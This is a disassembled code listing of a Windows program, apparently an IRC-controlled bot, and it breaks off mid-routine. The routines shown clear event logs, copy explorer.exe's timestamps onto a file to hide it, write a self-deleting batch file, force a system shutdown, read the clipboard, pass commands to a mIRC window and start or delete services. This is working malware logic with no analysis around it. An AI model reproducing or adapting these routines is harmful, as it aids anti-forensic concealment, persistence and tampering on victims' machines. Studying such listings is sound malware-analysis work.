mov al, byte ptr a__0[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_417C5B: ; CODE XREF: sub_417ADE+111�j
; sub_417ADE+122�j ...
push [ebp+var_C]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41C1E0
add esp, 0Ch
loc_417C6E: ; CODE XREF: sub_417ADE+D0�j
lea eax, [ebp+var_2C]
push eax
call sub_41AFE0
mov esi, eax
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+var_2C]
push eax
mov [ebp+var_4], esi
call sub_41D648
pop ecx
test eax, eax
pop ecx
jnz loc_417ED6
and [ebp+var_C], eax
movsx eax, byte ptr [ebx-1]
push eax
push edi
call sub_41BFB0
pop ecx
test eax, eax
pop ecx
jnz loc_417DCD
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_4276E0
call sub_41C798
cmp esi, 3
jz short loc_417CDC
cmp eax, 1
jnz loc_417DCD
loc_417CDC: ; CODE XREF: sub_417ADE+1F3�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_417D1E
push edi
call sub_41AFE0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul dbl_4276E0
call sub_41C798
mov al, byte ptr a__0[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_417D3A
; ---------------------------------------------------------------------------
loc_417D1E: ; CODE XREF: sub_417ADE+207�j
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276D0
call sub_41C798
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_417D3A: ; CODE XREF: sub_417ADE+23E�j
push 1
inc esi
pop ebx
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276C8
call sub_41C798
cmp esi, 3
jz short loc_417D63
cmp eax, ebx
jnz short loc_417DCD
loc_417D63: ; CODE XREF: sub_417ADE+27F�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_417DA8
push edi
call sub_41AFE0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul dbl_4276E0
call sub_41C798
mov al, byte ptr a__0[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_417DC6
; ---------------------------------------------------------------------------
loc_417DA8: ; CODE XREF: sub_417ADE+28F�j
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276D0
call sub_41C798
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_417DC6: ; CODE XREF: sub_417ADE+2C8�j
inc esi
mov [ebp+var_C], ebx
mov [ebp+var_4], esi
loc_417DCD: ; CODE XREF: sub_417ADE+1C9�j
; sub_417ADE+1F8�j ...
cmp esi, 6
jge loc_417E56
cmp esi, 5
jge short loc_417DEE
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276E8
jmp short loc_417E0C
; ---------------------------------------------------------------------------
loc_417DEE: ; CODE XREF: sub_417ADE+2FB�j
call sub_41B8E2
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_4276E0
loc_417E0C: ; CODE XREF: sub_417ADE+30E�j
call sub_41C798
test eax, eax
jnz short loc_417E2F
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276C0
call sub_41C798
mov cl, 30h
jmp short loc_417E4C
; ---------------------------------------------------------------------------
loc_417E2F: ; CODE XREF: sub_417ADE+335�j
cmp eax, 1
jnz short loc_417E56
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276D0
call sub_41C798
mov cl, 41h
loc_417E4C: ; CODE XREF: sub_417ADE+34F�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_417E56: ; CODE XREF: sub_417ADE+2F2�j
; sub_417ADE+354�j
cmp [ebp+var_C], 2
jge short loc_417ED6
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul dbl_4276E0
call sub_41C798
cmp eax, 1
jnz short loc_417ED6
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276C0
call sub_41C798
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276B8
call sub_41C798
cmp eax, 1
jnz short loc_417ED6
cmp [ebp+var_C], eax
jge short loc_417ED6
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276B0
call sub_41C798
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_417ED6: ; CODE XREF: sub_417ADE+1B1�j
; sub_417ADE+37C�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_41B5F0
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_417ADE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EEF proc near ; CODE XREF: sub_401ACD+BEC�p
; sub_401ACD+C29�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_417F7A
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_417F7A
cmp [ebp+arg_8], esi
jz short loc_417F7A
cmp byte ptr [eax], 0
jz short loc_417F7A
push ebx
push edi
call sub_426464
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_417F75
push [ebp+arg_4]
push edi
call sub_41B900
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_417F6E
sub eax, edi
push eax
push edi
push ebx
call sub_41B5F0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_41AFE0
push eax
push [ebp+arg_8]
push ebx
call sub_41C1E0
push [ebp+arg_4]
call sub_41AFE0
add eax, esi
push eax
push ebx
call sub_41BEC0
push ebx
push edi
call sub_41BEB0
add esp, 30h
mov esi, edi
loc_417F6E: ; CODE XREF: sub_417EEF+3C�j
push ebx
call sub_41B0B1
pop ecx
loc_417F75: ; CODE XREF: sub_417EEF+2B�j
mov eax, esi
pop ebx
jmp short loc_417F7C
; ---------------------------------------------------------------------------
loc_417F7A: ; CODE XREF: sub_417EEF+C�j
; sub_417EEF+13�j ...
xor eax, eax
loc_417F7C: ; CODE XREF: sub_417EEF+89�j
pop edi
pop esi
pop ebp
retn
sub_417EEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F80 proc near ; CODE XREF: sub_401955+E9�p
; sub_4101FD+F4�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_41B590
mov esi, [ebp+arg_0]
push esi
call sub_41AFE0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_417FB6
or eax, 0FFFFFFFFh
jmp short loc_418029
; ---------------------------------------------------------------------------
loc_417FB6: ; CODE XREF: sub_417F80+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_417FD8
loc_417FC2: ; CODE XREF: sub_417F80+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_417FCF
cmp dl, 0Dh
jnz short loc_417FD3
loc_417FCF: ; CODE XREF: sub_417F80+48�j
and byte ptr [ecx+esi], 0
loc_417FD3: ; CODE XREF: sub_417F80+4D�j
inc ecx
cmp ecx, eax
jl short loc_417FC2
loc_417FD8: ; CODE XREF: sub_417F80+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_418009
lea edi, [ebp+var_7CC]
loc_417FE5: ; CODE XREF: sub_417F80+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_418004
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_418004
cmp ebx, 1F4h
jge short loc_418009
mov [edi], ecx
inc ebx
add edi, 4
loc_418004: ; CODE XREF: sub_417F80+69�j
; sub_417F80+74�j
inc edx
cmp edx, eax
jl short loc_417FE5
loc_418009: ; CODE XREF: sub_417F80+5D�j
; sub_417F80+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_418027
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_41C310
add esp, 0Ch
loc_418027: ; CODE XREF: sub_417F80+8E�j
mov eax, ebx
loc_418029: ; CODE XREF: sub_417F80+34�j
pop esi
pop ebx
leave
retn
sub_417F80 endp
; =============== S U B R O U T I N E =======================================
sub_41802D proc near ; CODE XREF: sub_418087+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_418066
push ebx
mov ebx, edi
loc_41804A: ; CODE XREF: sub_41802D+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_418069
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_41804A
pop ebx
loc_418066: ; CODE XREF: sub_41802D+18�j
pop edi
pop esi
retn
sub_41802D endp
; =============== S U B R O U T I N E =======================================
sub_418069 proc near ; CODE XREF: sub_41802D+25�p
; sub_418087+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_41D74C
cmp al, 61h
pop ecx
jl short loc_418084
cmp al, 7Ah
jg short loc_418084
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_418084: ; CODE XREF: sub_418069+E�j
; sub_418069+12�j
xor eax, eax
retn
sub_418069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418087 proc near ; CODE XREF: sub_41528E+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_41BB20
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41AFE0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_41AFE0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_41802D
add esp, 14h
dec esi
mov edi, esi
loc_4180C5: ; CODE XREF: sub_418087+B6�j
test esi, esi
jle short loc_418143
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41D74C
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_41D74C
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41813B
loc_4180EB: ; CODE XREF: sub_418087+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_418069
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_41810C
mov eax, ecx
loc_41810C: ; CODE XREF: sub_418087+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_41813F
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41D74C
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_41D74C
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_4180EB
loc_41813B: ; CODE XREF: sub_418087+62�j
dec edi
dec esi
jmp short loc_4180C5
; ---------------------------------------------------------------------------
loc_41813F: ; CODE XREF: sub_418087+8A�j
xor eax, eax
jmp short loc_418148
; ---------------------------------------------------------------------------
loc_418143: ; CODE XREF: sub_418087+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_418148: ; CODE XREF: sub_418087+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_418087 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41814D proc near ; CODE XREF: sub_401ACD+67A4�p
; sub_401ACD+789F�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call dword_42708C ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call dword_427158 ; FormatMessageA
lea eax, [ebp+var_100]
loc_418186: ; CODE XREF: sub_41814D+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_418192
cmp cl, 9
jnz short loc_418195
loc_418192: ; CODE XREF: sub_41814D+3E�j
inc eax
jmp short loc_418186
; ---------------------------------------------------------------------------
loc_418195: ; CODE XREF: sub_41814D+43�j
; sub_41814D+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_4181AF
mov cl, [eax]
cmp cl, 2Eh
jz short loc_418195
cmp cl, 21h
jl short loc_418195
loc_4181AF: ; CODE XREF: sub_41814D+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_4DAE0C
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41B980
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_41814D endp
; =============== S U B R O U T I N E =======================================
sub_4181D7 proc near ; CODE XREF: sub_401ACD+24CB�p
push esi
push 0
call ds:dword_4CB624 ; OpenClipboard
test eax, eax
jz short loc_41820E
push 1
call ds:dword_4CB644 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_41820E
push edi
push esi
call dword_427160 ; GlobalLock
push esi
mov edi, eax
call dword_42715C ; GlobalUnlock
call ds:dword_4CB6A8 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41820E: ; CODE XREF: sub_4181D7+B�j
; sub_4181D7+19�j
xor eax, eax
pop esi
retn
sub_4181D7 endp
; =============== S U B R O U T I N E =======================================
sub_418212 proc near ; CODE XREF: sub_401ACD+7662�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc_0 ; "mIRC"
push esi
push edi
call ds:dword_4CB660 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_41828E
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_42716C ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call dword_427168 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_41B886
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_4CB6B0 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_4CB6B0 ; SendMessageA
push ebx
call dword_427164 ; UnmapViewOfFile
push edi
call dword_427068 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_418290
; ---------------------------------------------------------------------------
loc_41828E: ; CODE XREF: sub_418212+16�j
xor eax, eax
loc_418290: ; CODE XREF: sub_418212+7A�j
pop edi
pop esi
pop ebp
retn
sub_418212 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418294 proc near ; CODE XREF: sub_401221+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:dword_4CB710 ; SearchPathA
test eax, eax
jz short loc_418333
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, dword_4270EC
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_418333
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_427174 ; GetFileTime
push ebx
mov ebx, dword_427068
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_418333
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_427170 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_418333: ; CODE XREF: sub_418294+2A�j
; sub_418294+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_418294 endp
; =============== S U B R O U T I N E =======================================
sub_418338 proc near ; CODE XREF: sub_401ACD+16B2�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_419652
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_4CB594 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_418338 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835A proc near ; CODE XREF: sub_401ACD+2755�p
; sub_4163FA+472�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_429090, esi
push edi
jz short loc_41837E
cmp ds:dword_4CB724, esi
jnz short loc_41837E
push esi
call sub_401000
pop ecx
loc_41837E: ; CODE XREF: sub_41835A+13�j
; sub_41835A+1B�j
call sub_40B2C0
lea eax, [ebp+var_764]
push eax
push 400h
call dword_4270B0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call dword_4270EC ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_4184DE
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call dword_4270E0 ; WriteFile
push edi
call dword_427068 ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41B590
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_41B590
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43D808
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call dword_42709C ; GetModuleHandleA
push eax
call dword_427070 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call dword_427098 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_418486
lea eax, [ebp+var_15C]
push 80h
push eax
call dword_427094 ; SetFileAttributesA
loc_418486: ; CODE XREF: sub_41835A+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call dword_427178 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call dword_42706C ; CreateProcessA
loc_4184DE: ; CODE XREF: sub_41835A+72�j
pop edi
pop esi
leave
retn
sub_41835A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184E2 proc near ; CODE XREF: sub_401ACD+7233�p
var_294 = byte ptr -294h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h
lea eax, [ebp+var_94]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call dword_4270C8 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_418578
push [ebp+arg_10]
push [ebp+arg_C]
call ds:dword_4CB5D4 ; OpenEventLogA
push edi
push eax
call ds:dword_4CB5E4 ; ClearEventLogA
test eax, eax
jz short loc_41856A
push [ebp+arg_10]
push offset dword_439074
loc_418543: ; CODE XREF: sub_4184E2+94�j
lea eax, [ebp+var_294]
push eax
call sub_41B886
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 20h
jmp short loc_4185A2
; ---------------------------------------------------------------------------
loc_41856A: ; CODE XREF: sub_4184E2+57�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_43904C
jmp short loc_418543
; ---------------------------------------------------------------------------
loc_418578: ; CODE XREF: sub_4184E2+3F�j
lea eax, [ebp+var_294]
push offset unk_43901C
push eax
call sub_41B886
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 1Ch
loc_4185A2: ; CODE XREF: sub_4184E2+86�j
pop edi
leave
retn
sub_4184E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185A5 proc near ; CODE XREF: sub_401ACD+55FF�p
var_1C0 = byte ptr -1C0h
var_15C = byte ptr -15Ch
var_F8 = byte ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call dword_4270C8 ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_4185FB
cmp [ebp+var_8C], 0
jnz short loc_4185E4
push 1
pop eax
cmp [ebp+var_84], eax
jnz short loc_4185FB
leave
retn
; ---------------------------------------------------------------------------
loc_4185E4: ; CODE XREF: sub_4185A5+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_4185F6
cmp [ebp+var_8C], 5Ah
jnz short loc_4185FB
loc_4185F6: ; CODE XREF: sub_4185A5+46�j
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4185FB: ; CODE XREF: sub_4185A5+27�j
; sub_4185A5+3B�j ...
push esi
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call dword_4270B8 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push esi
call dword_4270BC ; GetProcAddress
push 32h
mov edi, eax
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_41D834
push 32h
lea eax, [ebp+var_15C]
push [ebp+arg_4]
push eax
call sub_41D834
push 32h
lea eax, [ebp+var_F8]
push [ebp+arg_8]
push eax
call sub_41D834
lea eax, [ebp+var_F8]
push eax
call sub_41D817
shl eax, 1
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_1C0]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call dword_427138 ; FreeLibrary
mov eax, edi
pop edi
pop esi
leave
retn
sub_4185A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418685 proc near ; CODE XREF: sub_40111D+F7�p
; sub_40E6D9+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_4276F8
call sub_41C798
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_418685 endp
; =============== S U B R O U T I N E =======================================
sub_4186C2 proc near ; CODE XREF: sub_401ACD:loc_406127�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_41871A
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_439098[esi]
push edi
push eax
call sub_41873C
add esp, 14h
test eax, eax
jnz short loc_41870A
push edi
push off_439094[esi]
push offset unk_4391A8
loc_4186FA: ; CODE XREF: sub_4186C2+56�j
mov esi, offset dword_4DB6D0
push esi
call sub_41B886
add esp, 10h
jmp short loc_418737
; ---------------------------------------------------------------------------
loc_41870A: ; CODE XREF: sub_4186C2+2A�j
push eax
call sub_4187DE
pop ecx
push eax
push edi
push offset unk_43917C
jmp short loc_4186FA
; ---------------------------------------------------------------------------
loc_41871A: ; CODE XREF: sub_4186C2+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_4DB6D0
push off_439090[eax*4]
push offset unk_439158
push esi
call sub_41B886
add esp, 0Ch
loc_418737: ; CODE XREF: sub_4186C2+46�j
mov eax, esi
pop edi
pop esi
retn
sub_4186C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41873C proc near ; CODE XREF: sub_4186C2+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_4CB648 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_418763
call dword_42708C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4187D8
; ---------------------------------------------------------------------------
loc_418763: ; CODE XREF: sub_41873C+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_4CB530 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_418783
call dword_42708C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4187D0
; ---------------------------------------------------------------------------
loc_418783: ; CODE XREF: sub_41873C+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_4187B6
cmp eax, 3
jz short loc_4187A7
jle short loc_4187C9
cmp eax, 6
jg short loc_4187C9
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_4CB59C ; ControlService
jmp short loc_4187BD
; ---------------------------------------------------------------------------
loc_4187A7: ; CODE XREF: sub_41873C+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_4CB538 ; StartServiceA
jmp short loc_4187BD
; ---------------------------------------------------------------------------
loc_4187B6: ; CODE XREF: sub_41873C+4D�j
push esi
call ds:dword_4CB5A0 ; DeleteService
loc_4187BD: ; CODE XREF: sub_41873C+69�j
; sub_41873C+78�j
test eax, eax
jnz short loc_4187C9
call dword_42708C ; RtlGetLastWin32Error
mov ebx, eax
loc_4187C9: ; CODE XREF: sub_41873C+54�j
; sub_41873C+59�j ...
push esi
call ds:dword_4CB54C ; CloseServiceHandle
loc_4187D0: ; CODE XREF: sub_41873C+45�j
push edi
call ds:dword_4CB54C ; CloseServiceHandle
pop esi
loc_4187D8: ; CODE XREF: sub_41873C+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_41873C endp
; =============== S U B R O U T I N E =======================================
sub_4187DE proc near ; CODE XREF: sub_4186C2+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_418893
jz loc_41888C
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_418856
jz short loc_41884C
mov ecx, eax
sub ecx, 3
